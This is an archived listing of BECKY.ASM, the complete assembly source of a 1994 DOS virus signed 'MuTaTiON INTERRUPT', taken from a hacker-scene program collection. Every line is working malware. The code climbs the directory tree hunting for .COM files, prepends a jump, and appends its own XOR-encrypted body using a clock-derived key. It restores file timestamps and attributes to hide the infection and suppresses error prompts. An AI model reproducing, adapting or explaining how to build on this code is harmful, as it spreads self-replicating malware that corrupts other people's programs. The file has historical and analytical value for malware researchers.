home *** CD-ROM | disk | FTP | other *** search
/ Collection of Hack-Phreak Scene Programs / cleanhpvac.zip / cleanhpvac / IVUPDAT2.ZIP / IVPCONBY.ZIP / BECKY.ASM < prev    next >
Assembly Source File  |  1994-09-22  |  11KB  |  268 lines

  1. ;  Becky Conner written by MuTaTiON INTERRUPT
  2. ;  To compile this use TASM /M becky.asm
  3. ;---------
  4.  
  5.  
  6. code    segment public 'code'
  7.         assume  cs:code
  8.         org     100h                              ; All .COM files start here
  9.  
  10. start:
  11.         db 0e9h,0,0                               ; Jump to the next command
  12.  
  13. virus:
  14.         call    realcode                          ; Push current location on stack
  15. realcode:
  16.         nop
  17.         pop     bp                                ; Get location off stack
  18.         nop
  19.         nop
  20.         sub     bp,offset realcode                ; Adjust it for our pointer
  21.         nop
  22.         nop
  23.         call    encrypt_decrypt                   ; Decrypt the virus first
  24.  
  25. encrypt_start   equ     $                         ; From here is encrypted
  26.  
  27.         lea     si,[bp+offset oldjump]            ; Location of old jump in si
  28.         mov     di,100h                           ; Location of where to put it in di
  29.         push    di                                ; Save so we could just return when done
  30.         movsb                                     ; Move a byte
  31.         movsw                                     ; Move a word
  32.  
  33.         lea     dx,[bp+offset dta]                ; Where to put New DTA
  34.         call    set_DTA                           ; Move it
  35.  
  36.         mov     ax,3524h                          ; Get int 24 handler
  37.         int     21h                               ; To ES:BX
  38.         mov     word ptr [bp+oldint24],bx         ; Save it
  39.         mov     word ptr [bp+oldint24+2],es
  40.  
  41.         mov     ah,25h                            ; Set new int 24 handler
  42.         lea     dx,[bp+offset int24]              ; DS:DX->new handler
  43.         int     21h
  44.  
  45.         push    cs                                ; Restore ES
  46.         pop     es                                ; 'cuz it was changed
  47.  
  48.         mov     ah,47h                            ; Get the current directory
  49.         mov     dl,0h                             ; On current drive
  50.         lea     si,[bp+offset currentdir]         ; Where to keep it
  51.         int     21h
  52.  
  53. dirloop:
  54.         lea     dx,[bp+offset comfilespec]
  55.         call    findfirst
  56.  
  57.         lea     dx,[bp+offset directory]          ; Where to change too '..'
  58.         mov     ah,3bh                            ; Change directory
  59.         int     21h
  60.         jnc     dirloop                           ; If no problems the look for files
  61.  
  62.         mov     ah,9                              ; Display string
  63.         lea     dx,[bp+virusname]
  64.         int     21h
  65.  
  66.         mov     ax,2524h                          ; Restore int 24 handler
  67.         lds     dx,[bp+offset oldint24]           ; To original
  68.         int     21h
  69.  
  70.         push    cs
  71.         pop     ds                                ; Do this because the DS gets changed
  72.  
  73.         lea     dx,[bp+offset currentdir]         ; Location Of original dir
  74.         mov     ah,3bh                            ; Change to there
  75.         int     21h
  76.  
  77.         mov     dx,80h                            ; Location of original DTA
  78.         call    set_dta                           ; Put it back there
  79.  
  80.         retn                                      ; Return to 100h to original jump
  81.  
  82. findfirst:
  83.         mov     ah,4eh                            ; Find first file
  84.         mov     cx,7                              ; Find all attributes
  85.  
  86. findnext:
  87.         int     21h                               ; Find first/next file int
  88.         jc      quit                              ; If none found then change dir
  89.  
  90.         call    infection                         ; Infect that file
  91.  
  92. Findnext2:
  93.         mov     ah,4fh                            ; Find next file
  94.         jmp     findnext                          ; Jump to the loop
  95.  
  96. quit:
  97.         ret
  98.  
  99. infection:
  100.         mov     ax,3d00h                          ; Open file for read only
  101.         call    open
  102.  
  103.         mov     ah,3fh                            ; Read from file
  104.         mov     cx,1ah
  105.         lea     dx,[bp+offset buffer]             ; Location to store them
  106.         int     21h
  107.  
  108.         mov     ah,3eh                            ; Close file
  109.         int     21h
  110.  
  111.         mov     ax,word ptr [bp+DTA+35]           ; Get end of file name in ax
  112.         cmp     ax,'DN'                           ; Does End in comma'ND'? (reverse order)
  113.         jz      quitinfect                        ; Yup so get another file
  114.  
  115. CheckCom:
  116.         mov     bx,[bp+offset dta+1ah]            ; Get file size
  117.         mov     cx,word ptr [bp+buffer+1]         ; Get jump loc of file
  118.         add     cx,eof-virus+3                    ; Add for virus size
  119.  
  120.         cmp     bx,cx                             ; Does file size=file jump+virus size
  121.         jz      quitinfect                        ; Yup then get another file
  122.         jmp     infectcom
  123.  
  124. quitinfect:
  125.         ret
  126.  
  127. InfectCom:
  128.         sub     bx,3                              ; Adjust for new jump
  129.         lea     si,[bp+buffer]
  130.         lea     di,[bp+oldjump]
  131.         movsw
  132.         movsb
  133.         mov     [bp+buffer],byte ptr 0e9h
  134.         mov     word ptr [bp+buffer+1],bx         ; Save for later
  135.  
  136.         mov     cx,3                              ; Number of bytes to write
  137.  
  138.         jmp     finishinfection
  139. FinishInfection:
  140.         push    cx                                ; save # of bytes to write
  141.         xor     cx,cx                             ; Set attriutes to none
  142.         call    attributes
  143.  
  144.         mov     al,2                              ; open file read/write
  145.         call    open
  146.  
  147.         mov     ah,40h                            ; Write to file
  148.         lea     dx,[bp+buffer]                    ; Location of bytes
  149.         pop     cx                                ; Get number of bytes to write
  150.         int     21h
  151.         jc      closefile
  152.  
  153.         mov     al,02                             ; Move Fpointer to eof
  154.         Call    move_fp
  155.  
  156. get_time:
  157.         mov     ah,2ch                            ; Get time for our encryption value
  158.         int     21h
  159.         cmp     dh,0                              ; If its seconds are zere get another
  160.         je      get_time
  161.         mov     [bp+enc_value],dh                 ; Use seconds value for encryption
  162.         call    encrypt_infect                    ; Encrypt and infect the file
  163. closefile:
  164.         mov     ax,5701h                          ; Set files date/time back
  165.         mov     cx,word ptr [bp+dta+16h]          ; Get old time from dta
  166.         mov     dx,word ptr [bp+dta+18h]          ; Get old date
  167.         int     21h
  168.  
  169.         mov     ah,3eh                            ; Close file
  170.         int     21h
  171.  
  172.         xor     cx,cx
  173.         mov     cl,byte ptr [bp+dta+15h]          ; Get old Attributes
  174.         call    attributes
  175.  
  176.         retn
  177.  
  178. move_fp:
  179.         mov     ah,42h                            ; Move file pointer
  180.         xor     cx,cx                             ; Al has location
  181.         xor     dx,dx                             ; Clear these
  182.         int     21h
  183.         retn
  184.  
  185. set_dta:
  186.         mov     ah,1ah                            ; Move the DTA location
  187.         int     21h
  188.         retn
  189.  
  190. open:
  191.         mov     ah,3dh                            ; open file
  192.         lea     dx,[bp+DTA+30]                    ; filename in DTA
  193.         int     21h
  194.         xchg    ax,bx                             ; file handle in bx
  195.         ret
  196.  
  197. attributes:
  198.         mov     ax,4301h                          ; Set attributes to cx
  199.         lea     dx,[bp+DTA+30]                    ; filename in DTA
  200.         int     21h
  201.         ret
  202. int24:                                            ; New int 24h (error) handler
  203.         mov     al,3                              ; Fail call
  204.         iret                                      ; Return from int 24 call
  205.  
  206. Virusname db 'Becky Conner - I Hate Mark!',10,13
  207. Author    db 'MuTaTiON INTERRUPT',10,13           ; Author Of This Virus
  208. Made_with db '[NOVEMBER 1994]',10,13,'$'          ; Please do not remove this
  209.  
  210. comfilespec  db  '*.com',0                        ; Holds type of file to look for
  211. directory    db '..',0                            ; Directory to change to
  212. oldjump      db  0cdh,020h,0h                     ; Old jump.  Is int 20h for file quit
  213.  
  214. encrypt_infect:
  215.         lea     si,[bp+offset move_begin]         ; Location of where to move from
  216.         lea     di,[bp+offset workarea]           ; Where to move it too
  217.         mov     cx,move_end-move_begin            ; Number of bytes to move
  218. move_loop:
  219.         movsb                                     ; Moves this routine into heap
  220.         loop    move_loop
  221.         lea     dx,[bp+offset workarea]
  222.         call    dx                                ; Jump to that routine just moved
  223.         ret
  224.  
  225. move_begin    equ     $                           ; Marks beginning of move
  226.         push    bx                                ; Save the file handle
  227.         lea     dx,[bp+offset encrypt_end]
  228.         call    dx                                ; Call the encrypt_decrypt procedure
  229.         pop     bx                                ; Get handle back in bx and return
  230.         mov     ah,40h                            ; Write to file
  231.         mov     cx,eof-virus                      ; Number of bytes
  232.         lea     dx,[bp+offset virus]              ; Where to write from
  233.         int     21h
  234.         push    bx                                ; Save the file handle
  235.         lea     dx,[bp+offset encrypt_end]
  236.         call    dx                                ; Decrypt the file and return
  237.         pop     bx                                ; Get handle back in bx and return
  238.         ret
  239. move_end      equ     $                           ; Marks the end of move
  240.  
  241. encrypt_end   equ     $                           ; Marks the end of encryption
  242.  
  243. encrypt_decrypt:
  244.         lea     bx,[bp+encrypt_start]             ; Where to start encryption
  245.         mov     cx,encrypt_end-encrypt_start      ; Number of bytes to encrypt
  246.         mov     dh,[bp+enc_value]                 ; Value to use for encryption
  247. encrypt_loop:
  248.         mov     ah,cs:[bx]                        ; Get a byte in ah
  249.         xor     ah,dh                             ; Xor it
  250.         mov     cs:[bx],ah                        ; Put it back
  251.         inc     bx                                ; Move to next byte and loop
  252.         loop    encrypt_loop
  253.         ret
  254.  
  255. enc_value     db    00h                           ; Hold the encryption value 00 for nul effect
  256.  
  257. eof     equ     $                                 ; Marks the end of file
  258.  
  259. workarea db     move_end-move_begin dup (?)       ; Holds the encrypt_infect routine
  260. currentdir db   64 dup (?)                        ; Holds the current dir
  261. dta     db      42 dup (?)                        ; Location of new DTA
  262. buffer db 1ah dup (?)                             ; Holds exe header
  263. oldint24 dd ?                                     ; Storage for old int 24h handler
  264.  
  265. code    ends
  266.         end     start
  267.  
  268.